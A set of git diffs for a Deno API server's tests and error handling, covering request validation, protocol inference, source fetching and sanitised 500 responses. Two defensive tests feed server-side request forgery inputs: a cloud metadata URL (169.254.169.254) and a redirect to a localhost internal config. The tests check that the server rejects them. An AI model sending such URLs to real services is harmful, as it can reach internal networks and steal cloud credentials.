+      // used to skip the readability gate entirely and return 200 with a
+      // GraphQL syntax error about `<` — the home page invites callers to
+      // pass `protocol`, so that path has to hold the same contract.
+      assertEquals(res.status, 422);
+      assertEquals((await res.json()).error, "invalid_schema");
+    },
+  );
+});
+
+Deno.test("POST /artifacts - an inline non-SDL document with protocol=gql is a 422", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ schema: JSON.stringify(minimalOas), protocol: "gql" }),
+  });
+
+  assertEquals(res.status, 422);
+  assertEquals((await res.json()).error, "invalid_schema");
+});
+
+Deno.test("POST /artifacts - a whole-body validation issue omits `path`", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ protocol: "oas" }),
+  });
+
+  assertEquals(res.status, 400);
+  const body = await res.json();
+  // The exactly-one rule is a whole-body check, so valibot has no dot path
+  // for it. The published contract declares `path` an optional string, so the
+  // key is omitted — emitting `null` made a legitimate 400 fail validation in
+  // a client generated from that contract.
+  assertEquals(body.issues.length > 0, true);
+  assertEquals("path" in body.issues[0], false);
+  assertEquals(typeof body.issues[0].message, "string");
+});
+
+Deno.test("POST /artifacts - a field-level validation issue keeps `path`", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ schema: JSON.stringify(minimalOas), protocol: "nope" }),
+  });
+
+  assertEquals(res.status, 400);
+  const body = await res.json();
+  assertEquals(body.issues[0].path, "protocol");
+});
+
 Deno.test("POST /artifacts - rejects a source pointing at a private address", async () => {
   await withStubbedFetch(
     () => {

--- a/deno/server/src/createServer.test.ts
+++ b/deno/server/src/createServer.test.ts
@@ -1,13 +1,13 @@
-import { assertEquals, assertExists } from 'jsr:@std/assert@^1.0.10'
-import * as v from 'valibot'
+import { assertEquals, assertExists } from "@std/assert";
+import * as v from "valibot";
 import type {
   Enrichments,
   GeneratorsMapContainer,
   ModelEntry,
-  TransformModelArgs
-} from '@skmtc/core'
-import { emptyEnrichmentSchema } from '@skmtc/core'
-import { createServer } from './createServer.ts'
+  TransformModelArgs,
+} from "@skmtc/core";
+import { emptyEnrichmentSchema } from "@skmtc/core";
+import { createServer } from "./createServer.ts";
 
 /**
  * Integration tests for `createServer`.
@@ -19,204 +19,423 @@ import { createServer } from './createServer.ts'
  */
 
 const minimalOas = {
-  openapi: '3.0.0',
-  info: { title: 'Test', version: '1.0.0' },
-  paths: {}
-}
+  openapi: "3.0.0",
+  info: { title: "Test", version: "1.0.0" },
+  paths: {},
+};
 
 const minimalSdl = /* GraphQL */ `
   type Query {
     ping: Boolean
   }
-`
+`;
 
 const mkApp = () =>
   createServer({
-    toGeneratorConfigMap: () => ({})
-  })
+    toGeneratorConfigMap: () => ({}),
+  });
 
-Deno.test('POST /artifacts - rejects body with no protocol', async () => {
-  const app = mkApp()
-  const res = await app.request('/artifacts', {
-    method: 'POST',
-    headers: { 'content-type': 'application/json' },
-    body: JSON.stringify({ schema: JSON.stringify(minimalOas) })
-  })
+Deno.test("POST /artifacts - infers protocol=oas from an OpenAPI document", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ schema: JSON.stringify(minimalOas) }),
+  });
 
-  // No `protocol` field → can't pick a variant in the discriminated
-  // union, so the body schema must reject.
-  assertEquals(res.status >= 400, true)
-})
+  // No `protocol` field → inferred from the document content (the
+  // `openapi` key marks it as OAS).
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertExists(body.artifacts);
+  assertExists(body.manifest);
+});
 
-Deno.test('POST /artifacts - accepts protocol=oas with OpenAPI body', async () => {
-  const app = mkApp()
-  const res = await app.request('/artifacts', {
-    method: 'POST',
-    headers: { 'content-type': 'application/json' },
+Deno.test("POST /artifacts - infers protocol=gql from SDL", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ schema: minimalSdl }),
+  });
+
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertExists(body.artifacts);
+  assertExists(body.manifest);
+});
+
+Deno.test("POST /artifacts - rejects body with neither schema nor source", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ protocol: "oas" }),
+  });
+
+  assertEquals(res.status, 400);
+  const body = await res.json();
+  assertEquals(body.error, "invalid_request");
+});
+
+Deno.test("POST /artifacts - rejects body with both schema and source", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
     body: JSON.stringify({
-      protocol: 'oas',
-      schema: JSON.stringify(minimalOas)
-    })
-  })
+      schema: JSON.stringify(minimalOas),
+      source: "https://example.com/openapi.json",
+    }),
+  });
 
-  assertEquals(res.status, 200)
-  const body = await res.json()
-  assertExists(body.artifacts)
-  assertExists(body.manifest)
+  assertEquals(res.status, 400);
+  const body = await res.json();
+  assertEquals(body.error, "invalid_request");
+});
+
+Deno.test("POST /artifacts - rejects a non-http source URL", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ source: "ftp://example.com/openapi.json" }),
+  });
+
+  assertEquals(res.status, 400);
+  const body = await res.json();
+  assertEquals(body.error, "invalid_request");
+});
+
+Deno.test("POST /artifacts - non-JSON body returns a structured 400", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: "not json",
+  });
+
+  assertEquals(res.status, 400);
+  const body = await res.json();
+  assertEquals(body.error, "invalid_request");
+});
+
+Deno.test("POST /artifacts - unreadable OAS document returns a structured 422", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ protocol: "oas", schema: '{"openapi": truncated' }),
+  });
+
+  assertEquals(res.status, 422);
+  const body = await res.json();
+  assertEquals(body.error, "invalid_schema");
+  assertExists(body.message);
+});
+
+Deno.test("POST /artifacts - accepts protocol=oas with OpenAPI body", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({
+      protocol: "oas",
+      schema: JSON.stringify(minimalOas),
+    }),
+  });
+
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertExists(body.artifacts);
+  assertExists(body.manifest);
   // Attribution is always enabled with a post-pass, so both fields are
   // present (empty here — the empty generator map emits no files).
-  assertEquals(Array.isArray(body.generationMap), true)
-  assertExists(body.sidecars)
-})
+  assertEquals(Array.isArray(body.generationMap), true);
+  assertExists(body.sidecars);
+});
 
-Deno.test('POST /artifacts - accepts protocol=gql with GraphQL SDL', async () => {
-  const app = mkApp()
-  const res = await app.request('/artifacts', {
-    method: 'POST',
-    headers: { 'content-type': 'application/json' },
+Deno.test("POST /artifacts - accepts protocol=gql with GraphQL SDL", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
     body: JSON.stringify({
-      protocol: 'gql',
-      schema: minimalSdl
-    })
-  })
+      protocol: "gql",
+      schema: minimalSdl,
+    }),
+  });
 
-  assertEquals(res.status, 200)
-  const body = await res.json()
-  assertExists(body.artifacts)
-  assertExists(body.manifest)
-})
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertExists(body.artifacts);
+  assertExists(body.manifest);
+});
 
-Deno.test('POST /artifacts - rejects body with invalid protocol', async () => {
-  const app = mkApp()
-  const res = await app.request('/artifacts', {
-    method: 'POST',
-    headers: { 'content-type': 'application/json' },
-    body: JSON.stringify({ schema: 'whatever', protocol: 'soap' })
-  })
+Deno.test("POST /artifacts - rejects body with invalid protocol", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ schema: "whatever", protocol: "soap" }),
+  });
 
-  // Variant schema rejection bubbles through Hono as a thrown error.
-  // Either way we verify an unknown protocol doesn't quietly succeed.
-  assertEquals(res.status >= 400, true)
-})
+  // An unknown protocol is a validation failure → structured 400.
+  assertEquals(res.status, 400);
+  const body = await res.json();
+  assertEquals(body.error, "invalid_request");
+});
 
-Deno.test('GET /generators - lists configured generator IDs', async () => {
+Deno.test("GET /generators - lists configured generator IDs", async () => {
   const modelGen: ModelEntry<Enrichments> = {
-    id: 'modelGen',
-    type: 'model',
+    id: "modelGen",
+    type: "model",
     toEnrichmentSchema: () => emptyEnrichmentSchema,
     isSupported: () => true,
     supportsVariant: () => false,
-    transform(_args: TransformModelArgs): void {}
-  }
+    transform(_args: TransformModelArgs): void {},
+  };
   const app = createServer({
     toGeneratorConfigMap: (() => ({ modelGen })) as <
-      EnrichmentType = undefined
-    >() => GeneratorsMapContainer<EnrichmentType>
-  })
+      EnrichmentType = undefined,
+    >() => GeneratorsMapContainer<EnrichmentType>,
+  });
 
-  const res = await app.request('/generators')
-  assertEquals(res.status, 200)
-  const body = await res.json()
-  assertEquals(body.generators, ['modelGen'])
-})
+  const res = await app.request("/generators");
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertEquals(body.generators, ["modelGen"]);
+});
 
-Deno.test('POST /descriptors - returns one descriptor per generator', async () => {
-  type Enrichment = { coerce?: boolean }
+Deno.test("POST /descriptors - returns one descriptor per generator", async () => {
+  type Enrichment = { coerce?: boolean };
   const modelGen: ModelEntry<Enrichment> = {
-    id: 'modelGen',
-    type: 'model',
+    id: "modelGen",
+    type: "model",
     isSupported: () => true,
     supportsVariant: () => false,
     toEnrichmentSchema: () => v.object({ coerce: v.optional(v.boolean()) }),
-    transform(_args: TransformModelArgs): void {}
-  }
+    transform(_args: TransformModelArgs): void {},
+  };
   const app = createServer({
     toGeneratorConfigMap: (() => ({ modelGen })) as <
-      EnrichmentType = undefined
-    >() => GeneratorsMapContainer<EnrichmentType>
-  })
+      EnrichmentType = undefined,
+    >() => GeneratorsMapContainer<EnrichmentType>,
+  });
 
-  const res = await app.request('/descriptors', { method: 'POST' })
-  assertEquals(res.status, 200)
-  const body = await res.json()
-  assertEquals(body.descriptors.length, 1)
-  assertEquals(body.descriptors[0].generator, 'modelGen')
-  assertEquals(body.descriptors[0].subjectType, 'model')
+  const res = await app.request("/descriptors", { method: "POST" });
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertEquals(body.descriptors.length, 1);
+  assertEquals(body.descriptors[0].generator, "modelGen");
+  assertEquals(body.descriptors[0].subjectType, "model");
   // The `coerce` boolean maps to a `toggle` field.
-  assertEquals(body.descriptors[0].fields[0].key, 'coerce')
-  assertEquals(body.descriptors[0].fields[0].type, 'toggle')
-})
+  assertEquals(body.descriptors[0].fields[0].key, "coerce");
+  assertEquals(body.descriptors[0].fields[0].type, "toggle");
+});
 
-Deno.test('POST /enrichment-defaults - empty generator map returns empty defaults', async () => {
-  const app = mkApp()
-  const res = await app.request('/enrichment-defaults', {
-    method: 'POST',
-    headers: { 'content-type': 'application/json' },
-    body: JSON.stringify({ protocol: 'oas', schema: JSON.stringify(minimalOas) })
-  })
+Deno.test("POST /enrichment-defaults - empty generator map returns empty defaults", async () => {
+  const app = mkApp();
+  const res = await app.request("/enrichment-defaults", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({
+      protocol: "oas",
+      schema: JSON.stringify(minimalOas),
+    }),
+  });
 
-  assertEquals(res.status, 200)
-  const body = await res.json()
-  assertEquals(body.enrichmentDefaults, {})
-  assertEquals(body.parseIssues, [])
-})
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertEquals(body.enrichmentDefaults, {});
+  assertEquals(body.parseIssues, []);
+});
 
-Deno.test('POST /enrichment-defaults - returns seeded defaults per supported subject', async () => {
-  type Enrichment = { subject?: { note?: string }; generator?: undefined; stack?: undefined }
+Deno.test("POST /enrichment-defaults - returns seeded defaults per supported subject", async () => {
+  type Enrichment = {
+    subject?: { note?: string };
+    generator?: undefined;
+    stack?: undefined;
+  };
   const modelGen: ModelEntry<Enrichment> = {
-    id: 'modelGen',
-    type: 'model',
+    id: "modelGen",
+    type: "model",
     isSupported: () => true,
     supportsVariant: () => false,
     toEnrichmentSchema: () =>
       v.object({
         subject: v.optional(v.object({ note: v.optional(v.string()) })),
         generator: v.undefined(),
-        stack: v.undefined()
+        stack: v.undefined(),
       }),
     transform(_args: TransformModelArgs): void {},
     toEnrichmentDefaults: ({ refName }) => ({
       subject: { note: `model ${refName}` },
       generator: undefined,
-      stack: undefined
-    })
-  }
+      stack: undefined,
+    }),
+  };
   const app = createServer({
     toGeneratorConfigMap: (() => ({ modelGen })) as <
-      EnrichmentType = undefined
-    >() => GeneratorsMapContainer<EnrichmentType>
-  })
+      EnrichmentType = undefined,
+    >() => GeneratorsMapContainer<EnrichmentType>,
+  });
 
   const oasWithModel = {
-    openapi: '3.0.0',
-    info: { title: 'Test', version: '1.0.0' },
+    openapi: "3.0.0",
+    info: { title: "Test", version: "1.0.0" },
     paths: {},
-    components: { schemas: { Widget: { type: 'object' } } }
-  }
+    components: { schemas: { Widget: { type: "object" } } },
+  };
 
-  const res = await app.request('/enrichment-defaults', {
-    method: 'POST',
-    headers: { 'content-type': 'application/json' },
-    body: JSON.stringify({ protocol: 'oas', schema: JSON.stringify(oasWithModel) })
-  })
+  const res = await app.request("/enrichment-defaults", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({
+      protocol: "oas",
+      schema: JSON.stringify(oasWithModel),
+    }),
+  });
 
-  assertEquals(res.status, 200)
-  const body = await res.json()
+  assertEquals(res.status, 200);
+  const body = await res.json();
   // Keyed by the `enrichments` config routing: `[id][refName]['main']`.
   assertEquals(body.enrichmentDefaults, {
-    modelGen: { Widget: { main: { note: 'model Widget' } } }
-  })
-})
+    modelGen: { Widget: { main: { note: "model Widget" } } },
+  });
+});
 
-Deno.test('POST /to-v3-json - converts OpenAPI source to v3 JSON', async () => {
-  const app = mkApp()
-  const res = await app.request('/to-v3-json', {
-    method: 'POST',
-    headers: { 'content-type': 'application/json' },
-    body: JSON.stringify({ schema: JSON.stringify(minimalOas) })
-  })
+/** Run `body` with `globalThis.fetch` replaced — the server fetches `source`
+ *  URLs through it, so tests need no network access. */
+const withStubbedFetch = async (
+  stub: (input: URL | RequestInfo) => Response | Promise<Response>,
+  body: () => Promise<void>,
+) => {
+  const original = globalThis.fetch;
+  globalThis.fetch =
+    ((input: URL | RequestInfo) =>
+      Promise.resolve(stub(input))) as typeof fetch;
+  try {
+    await body();
+  } finally {
+    globalThis.fetch = original;
+  }
+};
 
-  assertEquals(res.status, 200)
-  const body = await res.json()
-  assertEquals(body.schema.openapi, '3.0.0')
-})
+Deno.test("POST /artifacts - fetches a source URL and echoes the resolved source", async () => {
+  const requested: string[] = [];
+  await withStubbedFetch(
+    (input) => {
+      requested.push(String(input));
+      return new Response(JSON.stringify(minimalOas), { status: 200 });
+    },
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/openapi.json" }),
+      });
+
+      assertEquals(res.status, 200);
+      const body = await res.json();
+      assertExists(body.artifacts);
+      assertExists(body.manifest);
+      assertEquals(requested, ["https://example.com/openapi.json"]);
+      // The reproducibility receipt: requested URL, final URL (a constructed
+      // Response has no url, so it falls back to the requested one), digest.
+      assertEquals(body.source.url, "https://example.com/openapi.json");
+      assertEquals(body.source.resolvedUrl, "https://example.com/openapi.json");
+      assertEquals(body.source.digest.startsWith("sha256:"), true);
+    },
+  );
+});
+
+Deno.test("POST /artifacts - non-2xx source returns a structured 422", async () => {
+  await withStubbedFetch(
+    () => new Response("nope", { status: 404, statusText: "Not Found" }),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/missing.json" }),
+      });
+
+      assertEquals(res.status, 422);
+      const body = await res.json();
+      assertEquals(body.error, "source_fetch_failed");
+      assertEquals(body.message.includes("404"), true);
+    },
+  );
+});
+
+Deno.test("POST /artifacts - unreachable source returns a structured 422", async () => {
+  await withStubbedFetch(
+    () => {
+      throw new TypeError("connection refused");
+    },
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/openapi.json" }),
+      });
+
+      assertEquals(res.status, 422);
+      const body = await res.json();
+      assertEquals(body.error, "source_fetch_failed");
+    },
+  );
+});
+
+Deno.test("POST /subjects - accepts a source URL", async () => {
+  await withStubbedFetch(
+    () => new Response(JSON.stringify(minimalOas), { status: 200 }),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/subjects", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/openapi.json" }),
+      });
+
+      assertEquals(res.status, 200);
+      const body = await res.json();
+      assertExists(body.subjects);
+      assertEquals(body.parseIssues, []);
+    },
+  );
+});
+
+Deno.test("POST /to-v3-json - accepts a source URL", async () => {
+  await withStubbedFetch(
+    () => new Response(JSON.stringify(minimalOas), { status: 200 }),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/to-v3-json", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/openapi.json" }),
+      });
+
+      assertEquals(res.status, 200);
+      const body = await res.json();
+      assertEquals(body.schema.openapi, "3.0.0");
+    },
+  );
+});
+
+Deno.test("POST /to-v3-json - converts OpenAPI source to v3 JSON", async () => {
+  const app = mkApp();
+  const res = await app.request("/to-v3-json", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ schema: JSON.stringify(minimalOas) }),
+  });
+
+  assertEquals(res.status, 200);
+  const body = await res.json();
+  assertEquals(body.schema.openapi, "3.0.0");
+});

--- a/deno/server/src/createServer.test.ts
+++ b/deno/server/src/createServer.test.ts
@@ -1,4 +1,4 @@
-import { assertEquals, assertExists } from "@std/assert";
+import { assertEquals, assertExists, assertStringIncludes } from "@std/assert";
 import * as v from "valibot";
 import type {
   Enrichments,
@@ -132,6 +132,49 @@ Deno.test("POST /artifacts - unreadable OAS document returns a structured 422", 
   const body = await res.json();
   assertEquals(body.error, "invalid_schema");
   assertExists(body.message);
+});
+
+Deno.test("POST /artifacts - a truncated OpenAPI document is a 422, not SDL", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    // No `protocol` — the home page and the agent prompt both tell callers
+    // to omit it. A document that announces itself as OAS and then fails to
+    // parse must not be reclassified as GraphQL SDL, which would return 200
+    // with a GraphQL syntax error naming the wrong problem.
+    body: JSON.stringify({ schema: '{"openapi": "3.0.0", "info": {' }),
+  });
+
+  assertEquals(res.status, 422);
+  const body = await res.json();
+  assertEquals(body.error, "invalid_schema");
+});
+
+Deno.test("POST /artifacts - a truncated YAML OpenAPI document is a 422", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({
+      schema: "openapi: 3.0.0\ninfo:\n  title: x\n   bad indent: y",
+    }),
+  });
+
+  assertEquals(res.status, 422);
+  assertEquals((await res.json()).error, "invalid_schema");
+});
+
+Deno.test("POST /artifacts - an empty document is a 422", async () => {
+  const app = mkApp();
+  const res = await app.request("/artifacts", {
+    method: "POST",
+    headers: { "content-type": "application/json" },
+    body: JSON.stringify({ schema: "   " }),
+  });
+
+  assertEquals(res.status, 422);
+  assertEquals((await res.json()).error, "invalid_schema");
 });
 
 Deno.test("POST /artifacts - accepts protocol=oas with OpenAPI body", async () => {
@@ -390,6 +433,145 @@ Deno.test("POST /artifacts - unreachable source returns a structured 422", async
   );
 });
 
+/** A body that streams past the 20MB cap without declaring a
+ *  `content-length`, so the cap is enforced mid-stream. */
+const oversizedBody = (): ReadableStream<Uint8Array> => {
+  const megabyte = new Uint8Array(1024 * 1024);
+  let sent = 0;
+  return new ReadableStream({
+    pull(controller) {
+      controller.enqueue(megabyte);
+      sent += 1;
+      if (sent > 25) controller.close();
+    },
+  });
+};
+
+Deno.test("POST /artifacts - an oversized source returns a structured 422", async () => {
+  await withStubbedFetch(
+    () => new Response(oversizedBody(), { status: 200 }),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/huge.yaml" }),
+      });
+
+      // The cap is hit while reading, where the stream is locked by the
+      // reader — a plain `body.cancel()` there throws and would surface as
+      // a 500 carrying "Cannot cancel a locked ReadableStream".
+      assertEquals(res.status, 422);
+      const body = await res.json();
+      assertEquals(body.error, "source_fetch_failed");
+      assertStringIncludes(body.message, "limit");
+    },
+  );
+});
+
+Deno.test("POST /artifacts - a mid-stream body failure returns a structured 422", async () => {
+  await withStubbedFetch(
+    () =>
+      new Response(
+        new ReadableStream({
+          start(controller) {
+            controller.enqueue(new TextEncoder().encode("{"));
+            controller.error(new Error("connection reset"));
+          },
+        }),
+        { status: 200 },
+      ),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/slow.json" }),
+      });
+
+      // `fetch` resolves on headers, so a body that fails afterwards (read
+      // timeout, reset connection) is still a source-fetch failure.
+      assertEquals(res.status, 422);
+      assertEquals((await res.json()).error, "source_fetch_failed");
+    },
+  );
+});
+
+Deno.test("POST /artifacts - rejects a source pointing at a private address", async () => {
+  await withStubbedFetch(
+    () => {
+      throw new Error("fetch must not be attempted");
+    },
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({
+          source: "http://169.254.169.254/latest/meta-data/",
+        }),
+      });
+
+      assertEquals(res.status, 422);
+      const body = await res.json();
+      assertEquals(body.error, "source_fetch_failed");
+      assertStringIncludes(body.message, "private address");
+    },
+  );
+});
+
+Deno.test("POST /artifacts - rejects a redirect into a private address", async () => {
+  const requested: string[] = [];
+  await withStubbedFetch(
+    (input) => {
+      requested.push(String(input));
+      return new Response(null, {
+        status: 302,
+        headers: { location: "http://localhost:8080/internal/config" },
+      });
+    },
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/openapi.json" }),
+      });
+
+      // Every hop is checked, so a public-looking URL cannot redirect its
+      // way onto the deployment's own network.
+      assertEquals(res.status, 422);
+      assertStringIncludes((await res.json()).message, "private address");
+      assertEquals(requested, ["https://example.com/openapi.json"]);
+    },
+  );
+});
+
+Deno.test("POST /artifacts - follows a redirect and reports the final URL", async () => {
+  await withStubbedFetch(
+    (input) =>
+      String(input) === "https://example.com/openapi.json"
+        ? new Response(null, {
+          status: 302,
+          headers: { location: "/v1/openapi.json" },
+        })
+        : new Response(JSON.stringify(minimalOas), { status: 200 }),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/openapi.json" }),
+      });
+
+      assertEquals(res.status, 200);
+      const body = await res.json();
+      assertEquals(body.source.url, "https://example.com/openapi.json");
+      assertEquals(body.source.resolvedUrl, "https://example.com/v1/openapi.json");
+    },
+  );
+});
+
 Deno.test("POST /subjects - accepts a source URL", async () => {
   await withStubbedFetch(
     () => new Response(JSON.stringify(minimalOas), { status: 200 }),
@@ -438,4 +620,46 @@ Deno.test("POST /to-v3-json - converts OpenAPI source to v3 JSON", async () => {
   assertEquals(res.status, 200);
   const body = await res.json();
   assertEquals(body.schema.openapi, "3.0.0");
+});
+
+Deno.test("a SyntaxError raised below a route stays a 500", async () => {
+  const app = createServer({
+    toGeneratorConfigMap: () => {
+      // Stands in for a generator that `JSON.parse`s a malformed `x-`
+      // extension value: the request body was fine, so reporting this as
+      // "Request body is not valid JSON" would send the caller to debug the
+      // wrong thing — and a 4xx tells them it is theirs to fix.
+      throw new SyntaxError("Unexpected end of JSON input");
+    },
+  });
+
+  const res = await app.request("/generators");
+  assertEquals(res.status, 500);
+  assertEquals((await res.json()).error, "internal_error");
+});
+
+Deno.test("GET / - markdown for curl, HTML for a browser", async () => {
+  const app = mkApp();
+
+  const markdown = await app.request("/");
+  assertEquals(markdown.status, 200);
+  assertStringIncludes(
+    markdown.headers.get("content-type") ?? "",
+    "text/markdown",
+  );
+  assertStringIncludes(await markdown.text(), "# skmtc stack server");
+
+  const html = await app.request("/", { headers: { accept: "text/html" } });
+  assertEquals(html.status, 200);
+  assertStringIncludes(await html.text(), "<!doctype html>");
+});
+
+Deno.test("GET /index.md and /llms.txt - serve the markdown contract", async () => {
+  const app = mkApp();
+  for (const path of ["/index.md", "/llms.txt"]) {
+    const res = await app.request(path, { headers: { accept: "text/html" } });
+    assertEquals(res.status, 200);
+    // Unconditional markdown — the Accept header does not apply here.
+    assertStringIncludes(await res.text(), "## Endpoints");
+  }
 });

--- a/deno/server/src/createServer.test.ts
+++ b/deno/server/src/createServer.test.ts
@@ -497,6 +497,30 @@ Deno.test("POST /artifacts - a mid-stream body failure returns a structured 422"
   );
 });
 
+Deno.test("POST /artifacts - an HTML page from a source is a 422", async () => {
+  await withStubbedFetch(
+    () =>
+      new Response("<!doctype html><html><body>Sign in</body></html>", {
+        status: 200,
+        headers: { "content-type": "text/html" },
+      }),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({ source: "https://example.com/openapi.json" }),
+      });
+
+      // A source behind an SSO/CDN wall answers 200 text/html. YAML reads
+      // that as a plain scalar, so nothing throws — it must still be a 422
+      // rather than a GraphQL syntax error at 200.
+      assertEquals(res.status, 422);
+      assertEquals((await res.json()).error, "invalid_schema");
+    },
+  );
+});
+
 Deno.test("POST /artifacts - rejects a source pointing at a private address", async () => {
   await withStubbedFetch(
     () => {
@@ -636,6 +660,27 @@ Deno.test("a SyntaxError raised below a route stays a 500", async () => {
   const res = await app.request("/generators");
   assertEquals(res.status, 500);
   assertEquals((await res.json()).error, "internal_error");
+});
+
+Deno.test("a 500 does not echo the error to an anonymous caller", async () => {
+  const app = createServer({
+    toGeneratorConfigMap: () => {
+      throw new Error(
+        "No such file or directory (os error 2), open '/Users/someone/work/stack/.skmtc/foo/config.json'",
+      );
+    },
+  });
+
+  const res = await app.request("/generators");
+  assertEquals(res.status, 500);
+  const body = await res.json();
+  // The routes are unauthenticated, and an uncaught message can carry host
+  // paths and internal hostnames. `console.error` above puts the whole error
+  // in the deployment logs; the response carries only the shape.
+  assertEquals(body, {
+    error: "internal_error",
+    message: "The server failed to complete the request.",
+  });
 });
 
 Deno.test("GET / - markdown for curl, HTML for a browser", async () => {

--- a/deno/server/src/createServer.ts
+++ b/deno/server/src/createServer.ts
@@ -22,6 +22,7 @@ import {
 } from "./requestSchemas.ts";
 import type { Context } from "hono";
 import {
+  assertSdlReadable,
   fetchSource,
   resolveSchemaInput,
   SchemaReadError,
@@ -75,6 +76,9 @@ const toDocumentInput = async (
       }
     }
     case "gql": {
+      // The readability gate `inferProtocol` applies, applied again here so
+      // an explicit `protocol: "gql"` is not a way around it.
+      assertSdlReadable(schema);
       return { type: "gql", value: schema };
     }
     default: {
@@ -176,10 +180,16 @@ export const createServer = (
       return c.json({
         error: "invalid_request",
         message: "Request body failed validation.",
-        issues: error.issues.map((issue) => ({
-          path: v.getDotPath(issue),
-          message: issue.message,
-        })),
+        // `getDotPath` is null for a whole-body rule (the exactly-one check
+        // is one), and the contract declares `path` an optional string. Omit
+        // the key rather than sending a null the published schema forbids.
+        issues: error.issues.map((issue) => {
+          const path = v.getDotPath(issue);
+          return {
+            ...(path !== null ? { path } : {}),
+            message: issue.message,
+          };
+        }),
       }, 400);
     }
     if (error instanceof InvalidBodyError) {

--- a/deno/server/src/createServer.ts
+++ b/deno/server/src/createServer.ts
@@ -168,8 +168,9 @@ export const createServer = (
 
   // Structured errors, matching the published contract: a body that fails
   // validation is a 400 with field-level issues; an unfetchable source or an
-  // unreadable document is a 422 with a reason; anything else is a JSON 500.
-  // Never the bare-text default — every failure tells the caller what to fix.
+  // unreadable document is a 422 with a reason; anything else is a JSON 500
+  // carrying a fixed message. Never the bare-text default — a 4xx always
+  // tells the caller what to fix.
   app.onError((error, c) => {
     if (error instanceof v.ValiError) {
       return c.json({
@@ -193,10 +194,15 @@ export const createServer = (
     if (error instanceof SchemaReadError) {
       return c.json({ error: "invalid_schema", message: error.message }, 422);
     }
+    // The 4xx messages above are authored for the caller. An uncaught throw
+    // is not: its message can carry host paths, internal hostnames and
+    // whatever else a generator, core or the runtime put in it, and this
+    // route surface is unauthenticated. The log gets the whole error, the
+    // caller gets the shape.
     console.error(error);
     return c.json({
       error: "internal_error",
-      message: error instanceof Error ? error.message : String(error),
+      message: "The server failed to complete the request.",
     }, 500);
   });
 

--- a/deno/server/src/createServer.ts
+++ b/deno/server/src/createServer.ts
@@ -19,7 +19,13 @@ import {
   toV3JsonBody,
   validateBody,
 } from "./requestSchemas.ts";
-import type { ArtifactsBody } from "./requestSchemas.ts";
+import {
